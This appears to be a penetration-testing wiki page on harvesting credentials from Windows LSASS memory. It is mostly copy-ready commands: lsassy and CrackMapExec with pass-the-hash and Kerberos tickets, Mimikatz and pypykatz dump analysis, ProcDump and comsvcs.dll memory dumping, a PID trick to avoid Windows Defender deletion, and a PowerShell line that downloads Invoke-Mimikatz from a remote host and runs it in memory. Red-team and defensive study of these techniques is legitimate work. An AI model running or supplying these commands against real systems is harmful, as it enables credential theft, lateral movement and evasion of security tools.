LSASS secrets
MITRE ATT&CKโ„ข Sub-technique T1003.001

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. It verifies users logging in, handles password changes and creates access tokens. Those operations lead to the storage of credential material in the process memory of LSASS. With administrative rights only, this material can be harvested (either locally or remotely).

Practice

Lsassy
Mimikatz
Pypykatz
ProcDump
comsvcs.dll
PowerSploit
โ€‹Lsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.
1
# With pass-the-hash (NTLM)
2
lsassy -u $USER -H $NThash $TARGETS
3
โ€‹
4
# With plaintext credentials
5
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
6
โ€‹
7
# With pass-the-ticket (Kerberos)
8
lsassy -k $TARGETS
9
โ€‹
10
# CrackMapExec Module examples
11
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
12
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
13
crackmapexec smb $TARGETS -k -M lsassy
14
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
Copied!
โ€‹Mimikatz can be used locally to extract credentials from lsass's process memory, or remotely to analyze a memory dump (dumped with ProcDump for example).
1
# (Locally) extract credentials from LSASS process memory
2
sekurlsa::logonpasswords
3
โ€‹
4
# (Remotely) analyze a memory dump
5
sekurlsa::minidump lsass.dmp
6
sekurlsa::logonpasswords
Copied!
For Windows 2000, a special version of mimikatz called mimilove can be used.
โ€‹Pypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).
1
pypykatz lsa minidump lsass.dmp
Copied!
The legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.
1
procdump --accepteula -ma lsass lsass.dmp
Copied!
Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.
1
# Find lsass's pid
2
tasklist /fi "imagename eq lsass.exe"
3
โ€‹
4
# Dump lsass's process memory
5
procdump -accepteula -ma $lsass_pid lsass.dmp
Copied!
Once the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).
The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.
1
# Find lsass's pid
2
tasklist /fi "imagename eq lsass.exe"
3
โ€‹
4
# Dump lsass's process memory
5
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full
Copied!
โ€‹PowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.
1
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
Copied!
Recovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).

References

Extract credentials from lsass remotely
hackndo
Last modified 6mo ago
Copy link